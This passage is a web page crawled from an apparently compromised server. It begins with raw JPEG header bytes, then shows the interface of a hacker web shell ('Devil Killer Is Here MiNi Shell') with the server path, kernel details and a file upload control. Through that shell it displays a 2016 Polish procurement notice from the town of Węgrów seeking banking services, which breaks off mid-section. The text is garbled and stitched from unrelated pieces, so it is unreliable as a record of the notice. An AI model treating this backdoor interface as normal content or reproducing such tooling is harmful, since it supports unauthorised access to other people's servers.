JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161202/357946-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.bip.wegrow.com.pl' target='_blank'>http://www.bip.wegrow.com.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 357946 - 2016
              z dnia 2016-12-02 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Węgrów: Obsługa bankowa budżetu Miasta Węgrowa i jednostek organizacyjnych<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Miasto Węgrów, krajowy numer identyfikacyjny
              71158223300000, ul.
              ul. Rynek Mariacki 
              16,
              07100  
              Węgrów, woj.
              mazowieckie, państwo
              Polska, tel.
              25 792 23 26, e-mail
              anna.piotrowska@wegrow.com.pl, faks
              25 792 25 23.
              <br />
              Adres strony internetowej (URL): wwwbip.wegrow.com.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.bip.wegrow.com.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.bip.wegrow.com.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie<br />
                Adres:
                <br />Urząd Miejski w Węgrowie, ul. Rynek Mariacki 16, 07-100 Węgrów Biuro Obsługi Intersanta</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Obsługa bankowa budżetu Miasta Węgrowa i jednostek organizacyjnych<br /><b>Numer referencyjny: </b>FE.271.1.9.2.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest usługa polegająca na kompleksowej obsłudze bankowej budżetu Miasta Węgrów poprzez obsługę 9 jednostek organizacyjnych działających na terenie miasta Węgrowa.

Wykonawca zobowiązany będzie do otwarcia i prowadzenia rachunku bieżącego oraz rachunków pomocniczych Miasta i  9 jednostek organizacyjnych tj.:
1.	Urząd Miejski
2.	Centrum Pomocy Społecznej
3.	Gimnazjum
4.	Szkoła Podstawowa
5.	Przedszkole nr 1
6.	Przedszkole nr 2
7.	Przedszkole nr 3
8.	Węgrowski Ośrodek Kultury
9.	Miejska Biblioteka Publiczna

Na przedmiot zamówienia składa się m. in.:
1.	Otwarcie i prowadzenie rachunku bieżącego budżetu miasta,
2.	Otwarcie i prowadzenie rachunków budżetu miasta dla obsługi środków pochodzących ze źródeł zagranicznych i  krajowych, w tym w euro,
3.	Otwarcie i prowadzenie rachunków bieżących i pomocniczych jednostek organizacyjnych miasta,
4.	Realizacja zleceń płatniczych  przelewów na rachunki prowadzone w innych bankach oraz banku prowadzącym obsługę rachunku przekazywanych w formie elektronicznej oraz papierowej. Zlecenia płatnicze złożone do godziny 14:30 realizowane powinny być w tym samym dniu. Przelewy złożone po tej godzinie zostaną przekazane do realizacji najpóźniej w następnym dniu roboczym. 
5.	Możliwość realizacji przelewów elektronicznych w wydłużonej sesji do godziny 15:20 jako przelew pilny.
6.	Możliwość wypłat gotówkowych z tytułu świadczeń pomocy społecznej, świadczeń wychowawczych i rodzinnych w formie elektronicznego czeku/wypłaty masowej  zlecenie wypłaty gotówkowej za pośrednictwem bankowości elektronicznej wypłaconej w Oddziale Banku za okazaniem przez odbiorcę dowodu tożsamości. Wypłaty nastąpią na podstawie listy wypłat sporządzonej przez jednostkę organizacyjną Zamawiającego w formie pliku elektronicznego zawierającej dane w zakresie: kwoty świadczenia, imienia i nazwiska świadczeniobiorcy, nr dokumentu tożsamości (dowód osobisty, paszport) oraz datę ważności listy wypłat. Bank zobowiązuje się do wypłaty świadczeń z zachowaniem szczególnych zasad ochrony danych osobowych beneficjentów, uniemożliwiając osobom nieupoważnionym do wglądu w dane osobowe i kwotę wypłacanych świadczeń.
7.	Sporządzanie na pisemne żądanie jednostki organizacyjnej Zamawiającego papierowych wyciągów bankowych przez Bank każdego dnia i wydawanie w następnym dniu roboczym po dokonaniu operacji osobom wymienionym w karcie wzorów podpisów lub innym osobom upoważnionym przez jednostkę organizacyjną Zamawiającego,
8.	Przyjmowanie wpłat gotówkowych i realizacja wypłat gotówkowych z wszystkich rachunków bez pobierania opłat i prowizji od posiadaczy rachunków. Bank zagwarantuje bezkolejkową obsługę w wyodrębnionym pomieszczeniu dla pracowników Urzędu Miejskiego i miejskich jednostek organizacyjnych wykonujących czynności służbowe związane z kontaktami z bankiem oraz obsługą rachunków bankowych. Wypłaty gotówkowe będą wypłacane w nominałach wskazanych w zapotrzebowaniu składanym przez Zamawiającego,
9.	Przyjmowanie wpłat gotówkowych w formie bilonu i policzenie przez Wykonawcę bilonu,
10.	Przyjmowanie wpłat gotówkowych od osób trzecich dokonywanych na wszystkie rachunki bankowe jednostek organizacyjnych Zamawiającego w placówkach bankowych znajdujących się na terenie miasta Węgrowa  bez pobierania opłat, 
11.	Przyjmowanie wpłat gotówkowych od jednostek organizacyjnych Zamawiającego w placówkach bankowych znajdujących się na terenie miasta Węgrowa na inne rachunki bankowe  bez pobierania opłat, 
12.	Przyjmowanie wpłat gotówkowych w formie otwartej (w Oddziale Banku) oraz w formie zamkniętej (do całodobowej wrzutni) dla potrzeb jednostek organizacyjnych Zamawiającego. Wykonawca zapewni księgowanie wpłat gotówkowych w dniu dokonania wpłaty.
13.	Zapewnienia możliwości realizowania wypłat gotówkowych poprzez system wypłat elektronicznych (elektroniczne czeki),
14.	Możliwość przyjmowania wpłat przez Zamawiającego poprzez terminale obsługujące karty płatnicze i karty kredytowe klientów, przy zachowaniu postanowień ustawy z dnia 19 sierpnia 2011 r.  o usługach płatniczych (Dz. U. z 2016 r. poz. 1572) w jednostkach wskazanych przez Zamawiającego,
15.	Uwzględnienie w ustalaniu wysokości środków do oprocentowania bieżących wpływów dnia (min. do godziny 16:00). Wykonawca zobowiązany będzie do dokonywania miesięcznej kapitalizacji odsetek od środków zgromadzonych na rachunkach bankowych i odprowadzania na koniec każdego miesiąca odsetek z rachunków bieżących wskazanych miejskich jednostek organizacyjnych na rachunek bieżący budżetu miasta.

16.	Zapewnienie możliwości lokowania wolnych środków znajdujących się na rachunku bieżącym budżetu Miasta w formie lokat terminowych 1-tygodniowych, których stawka oprocentowania będzie zgodna ze złożoną ofertą.

17.	Prowadzenie skonsolidowanego rachunku miasta Węgrowa, polegającego na dokonaniu na koniec każdego dnia roboczego (o godz.19:00) przeksięgowania salda grupy rachunków obejmującej rachunek podstawowy budżetu i inne rachunki wskazane przez Zamawiającego na odrębny rachunek konsolidacyjny budżetu Miasta:
a)	W sytuacji, gdy na rachunku bieżącym budżetu Miasta wystąpi saldo debetowe  suma sald uzyskanych w skutek konsolidacji posłuży do zredukowania debetu. Koszty kredytu dotyczyć będą kwoty debetu rachunku bieżącego budżetu miasta zredukowanego przez sumę sald pozostałych rachunków podlegających konsolidacji,
b)	Oprocentowanie zgromadzonych środków jednolitą stawką wyliczoną zgodnie z zasadami określonymi w ofercie,
c)	Gromadzeniu odsetek powstałych z oprocentowania od środków pieniężnych zgromadzonych na rachunku skonsolidowanym,
d)	Przeniesienie na moment rozpoczęcia następnego dnia roboczego środków z rachunku konsolidacyjnego na odpowiednie rachunki budżetu i inne wskazane przez Zamawiającego.

18.	Przeniesieniu środków z rachunków wskazanych przez Zamawiającego na koniec każdego dnia roboczego na rachunek bieżący budżetu.

19.	Przeniesieniu środków na koniec każdego roku (31.12.) z rachunków wskazanych przez Zamawiającego na rachunek bieżący budżetu.

20.	Zapewnienie możliwości zaciągania kredytów w rachunku bieżącym budżetu na pokrycie występującego w ciągu roku przejściowego deficytu budżetu poprzez wystawianie dyspozycji obciążeniowych powodujących powstanie debetowego salda rachunku bieżącego budżetu  miasta w wysokości nie przekraczającej 2 mln rocznie. Kwota powyższa może ulec zmianie w przypadku innej wysokości jej ustalenia w uchwale Rady Miejskiej Węgrowa w sprawie uchwalenia budżetu na dany rok budżetowy. Jedynym dopuszczalnym przez Zamawiającego zabezpieczeniem kredytu w rachunku bieżącym budżetu może być oświadczenie o poddaniu się egzekucji w trybie art. 97 ustawy z dnia 29 sierpnia 1997r. Prawo bankowe (Dz.U. z 2015r. poz. 128 z poźn.zm.) prowadzonej według przepisów kodeksu postępowania cywilnego,

21.	W przypadku wpłaty wadium przez uczestników postępowania przetargowego, Wykonawca zobowiązany jest umożliwić Zamawiającemu ustalenie godziny uznania rachunku bankowego Zamawiającego,

22.	W przypadkach wpłat na rachunki sum depozytowych Wykonawca jest zobowiązany do wyliczenia kwoty przypadających na daną wpłatę odsetek bankowych na wskazany dzień celem ich zwrotu wpłacającemu,

23.	Zapewnienie możliwości identyfikowania płatności masowych polegających na:
a)	Przeprowadzeniu rozliczeń pieniężnych z tytułu zrealizowanych dyspozycji płatniczych na rachunkach wirtualnych Zamawiającego (wpłat gotówkowych, poleceń przelewu, a w tym dokonywanych przy użyciu systemu bankowości elektronicznej, wpłat otrzymanych z urzędów pocztowych lub innych banków)
b)	Uznania rachunku bieżącego kwotami przetworzonych płatności masowych w tym samym dniu roboczym, w którym przetwarzane (wpłacone) były płatności masowe,
c)	Zapisywaniu na rachunku bieżącym sumarycznej kwoty zrealizowanych dyspozycji płatniczych w tym samym dniu roboczym, w którym były przetwarzane masowe płatności,
d)	Generowaniu i przekazywaniu informacji o masowych płatnościach dokonywanych na rzecz Zamawiającego (plik wyjściowy) za pomocą bankowości elektronicznej; plik wyjściowy powinien być udostępniony najpóźniej w następnym dniu roboczym do godz.8:00 po dniu przetwarzania płatności masowych,
e)	Zautomatyzowaniu identyfikacji płatnika i rodzaju płatności polegającej na udostępnieniu przez bank odpowiedniej ilości cyfr (nie mniej niż 8) w ramach numeru rachunku bankowego. W ramach cyfr Zamawiający stworzy własny identyfikator i rodzaj płatności, a utworzone w ten sposób numery rachunków bankowych będą stanowić wirtualne subkonto do rachunku bankowego Zamawiającego. Wczytanie pliku do systemu finansowo-księgowego leży po stronie Zamawiającego.
f)	Przekazywaniu pełnych informacji w pliku wyjściowym dla Zamawiającego o źródle płatności, rodzaju płatności, dacie obciążenia rachunku dłużnika w innym banku (pod warunkiem korzystania z systemu Eliksir i możliwości przekazania takich informacji z banku dłużnika do banku Zamawiającego) oraz reklamacjach i dokonanych zwrotach,
 
24.	Zamawiający musi posiadać dostęp do wykonywania usługi systemem elektronicznym, możliwość elektronicznego wykonywania operacji na rachunkach z dowolnej ilości stanowisk pracy Zamawiającego odrębnie dla każdej jednostki organizacyjnej. System musi zapewniać:
a)	Dokonywanie przelewów (krajowych i zagranicznych), również z datą przyszłą przelewu, możliwość jednorazowego wysłania grupy przelewów,
b)	Udostępnienie usługi polecenia zapłaty,
c)	Przesyłanie danych w formie elektronicznej obejmującej zbiory przelewów,
d)	Zautomatyzowanie szeregu czynności przy rejestracji dyspozycji przelewu zmniejszając do minimum prawdopodobieństwo popełniania błędu (szablony przelewów, kontrola rachunków, kontrola uprawnień),
e)	Bieżącego dysponowania środkami wpływającymi na rachunek,
f)	Szybki i łatwy dostęp do aktualnych informacji o stanie środków na rachunkach bankowych oraz o przeprowadzonych transakcjach, w tym:
	przeglądu historii operacji w pełnym rozbiciu analitycznym oraz przeglądu operacji bieżąco rejestrowanych na rachunkach  bez ograniczeń czasowych,
	tworzenie raportów z operacji na poszczególnych rachunkach bankowych z możliwością sortowania, filtrowania i podglądu wybranego typu operacji z możliwością wydruku,
	podglądu aktualnego salda na wybranym rachunku lub wybranej grupie rachunków,
	pobieranie wyciągów bankowych w postaci plików, z możliwością ich automatycznego drukowania wraz z pojedynczymi poleceniami przelewów,
	pobieranie plików z danymi dotyczącymi automatycznego uzgadniania wpłat,
	monitoring stanu rachunków bankowych jednostek organizacyjnych wskazanych przez Zamawiającego, posiadających rachunki w tym samym banku,
	informacja o odrzuceniu transakcji z podaniem komunikatu o jej przyczynie,
	tworzenie zbiorów danych kontrahentów, numerów rachunków i innych danych ewidencyjnych, przeszukiwanie zbiorów wszystkich operacji według rodzaju operacji, nazwy  kontrahenta, daty, kwoty i ciągu znaków z tytułu przelewu,
g)	Umożliwienie odblokowania użytkownika przez konsultanta w rozmowie telefonicznej lub poprzez system bankowości elektronicznej,
h)	Dodanie nowego użytkownika bankowości elektronicznej za pośrednictwem wniosku lub poprzez system bankowości elektronicznej,
i)	Składanie wniosku o otwarcie nowego rachunku bankowego za pośrednictwem wniosku lub za pośrednictwem systemu bankowości elektronicznej,
j)	Możliwość wglądu do historii operacji na poszczególnych rachunkach Zamawiającego w całym okresie wykonywania zamówienia,
k)	Możliwość podglądu on-line środków i historii operacji na rachunkach bankowych wszystkich podległych jednostek.

25.	Zainstalowanie systemu bankowości elektronicznej we wszystkich jednostkach organizacyjnych Zamawiającego, przy uwzględnieniu nw. minimalnych wymagań:
a)	System oparty o zdalny dostęp z poziomu przeglądarek internetowych zainstalowany na serwerze banku (system online, na stacji roboczej użytkownika nie jest instalowane dodatkowe oprogramowanie klienckie),
b)	Możliwa praca wielu użytkowników z przyznawaniem uprawnień użytkownika na podstawie podanej nazwy użytkownika i hasła lub certyfikatu.

26.	Umożliwienie pełnego zastosowania podpisu elektronicznego zgodnie z systemem pełnomocnictw, na różnych poziomach autoryzacji  z uwzględnieniem różnej klasy podpisów  (w tym podpisy łączne) lub autoryzacji z wykorzystaniem jednorazowych kodów SMS z zachowaniem wszelkiej kombinacji podpisów,

27.	Zapewnienie, że wszelka komunikacja poprzez system bankowości elektronicznej spełnia wysokie wymogi bezpieczeństwa, w tym przewiduje:
a)	Weryfikację uprawnień użytkownika na poziomie logowania do aplikacji na podstawie nazwy użytkownika i hasła lub certyfikatu,
b)	Identyfikację połączenia za pomocą:
	Haseł jednorazowych generowanych przez token,
	Sprawdzenie numeru IP nawiązującego połączenie w przypadku łączności przez Internet,
	Weryfikacja historii połączeń  porównanie historii zapisanej w banku i u klienta
c)	Zastosowanie indywidualnych plików transmisyjnych,
d)	Automatyczną blokadę po kilkukrotnych próbach dostępu z błędnie podanym hasłem,

28.	 Zapewnienie integracji systemu bankowości elektronicznej z systemem finansowo-księgowym Urzędu Miejskiego i miejskich jednostek organizacyjnych, która pozwoli na:
a)	Import danych adresowych i informacji o rachunkach z systemu bankowości elektronicznej do systemu finansowo-księgowego Zamawiającego,
b)	Eksport poleceń przelewów z systemu finansowo-księgowego Zamawiającego do systemu bankowości elektronicznej,
c)	Import potwierdzeń przelewów z systemu bankowości elektronicznej do systemu finansowo-księgowego Zamawiającego,

29.	W przypadku wystąpienia awarii systemu Wykonawca gwarantuje możliwość korzystania z usługi typu teleserwis umożliwiającej telefoniczne uzyskanie informacji o stanie rachunków,

30.	Zapewnienie bezpłatnej pomocy technicznej przez cały okres umowy polegającej na:
a)	Przeszkoleniu pracowników obsługujących system bankowości elektronicznej Urzędu Miejskiego i miejskich jednostek organizacyjnych,
b)	Obsłudze zgłoszonych problemów z czasem reakcji max. 2 godziny od zgłoszenia problemu,
c)	Obsłudze telefonicznej typu Hot Line w godzinach pracy jednostek organizacyjnych Zamawiającego,

31.	Wydawanie opinii bankowych i zaświadczeń na potrzeby Zamawiającego i jednostek organizacyjnych bez ponoszenia dodatkowych kosztów przez Zamawiającego,

32.	Zobowiązanie banku do stwierdzenia ważności podpisów przez osoby uprawnione do składania oświadczeń majątkowych w imieniu Zamawiającego, na wezwaniach do zapłaty z tytułu udzielonej gwarancji i przekazywania wezwań za pośrednictwem banku gwaranta

33.	Zobowiązanie Wykonawcy do bezpłatnego udzielania informacji w zakresie przedmiotu zamówienia,

34.	Osoby wykonujące zamówienie winny być zobowiązane do zachowania tajemnicy bankowej.

35.	Zapewnienia, że:
a)	Wykonawca nie będzie pobierać od Zamawiającego ani jego jednostek organizacyjnych żadnych prowizji i opłat za wykonywanie czynności innych niż jednolita opłata ryczałtowa określona w pkt 1 oferty,
b)	Jeżeli w trakcie trwania umowy powstaną lub zostaną przekazane miastu inne jednostki organizacyjne miasta, zostaną one włączone do obsługi bez dodatkowych opłat,
c)	Zmiana stanu rachunków bankowych oraz form organizacyjnych jednostek nie spowoduje zmiany opłaty ryczałtowej,
d)	Oprocentowanie środków na rachunkach wskazanych przez Zamawiającego jako nie podlegające konsolidacji podlega odniesieniu na właściwe konta, jakiego dotyczą.

Zamawiający zastrzega sobie prawo do zmiany ilości prowadzonych 
w poszczególnych jednostkach rachunków bankowych, bez konieczności zmiany zawartej umowy. Rachunki będą otwierane i zamykane przez osoby uprawnione ze strony Zamawiającego i jednostek organizacyjnych objętych zawartą umową.
W przypadku, gdy wybrany Wykonawca nie posiada na terenie miasta Węgrowa siedziby, siedziby oddziału albo filii, zobowiązany będzie do uruchomienia na terenie miasta, swojego oddziału lub filii zapewniając pełną obsługę budżetu miasta, najpóźniej do terminu rozpoczęcia obowiązywania umowy tj. do 01.01.2017 roku. W przypadku, gdy wybrany Wykonawca nie dochowa wskazanego powyżej terminu i nadal nie posiada swojej siedziby w mieście Węgrów, do czasu uruchomienia placówki zobowiązany będzie do zapewnienia codziennej obsługi budżetu miasta Węgrowa w miejscowości Węgrów i zapewnienia możliwości przeprowadzenia wszystkich operacji bankowych bez ponoszenia dodatkowych kosztów ze strony zamawiającego (transport gotówki  przywóz, odbiór będzie dokonywany przez Wykonawcę na jego koszt).
Zamawiajacy zastrzega sobie prawo swobodnego lokowania wolnych środków w innych bankach.
36.	Wynagrodzenie za wykonanie obsługi bankowej będzie stanowic: 
1)	Opłata ryczałtowa za realizację przedmiotu zamówienia
2)	Koszt obsługi kredytów bankowych

<br /><br /><b>II.5) Główny kod CPV: </b>66110000-4<br /><b> Dodatkowe kody CPV:</b>66112000-8,
                66113000-5<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data rozpoczęcia: 01/01/2017
                    data zakończenia: 31/12/2021<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający uzna warunek za spełniony jeżeli Wykonawca posiada i przedłoży: 

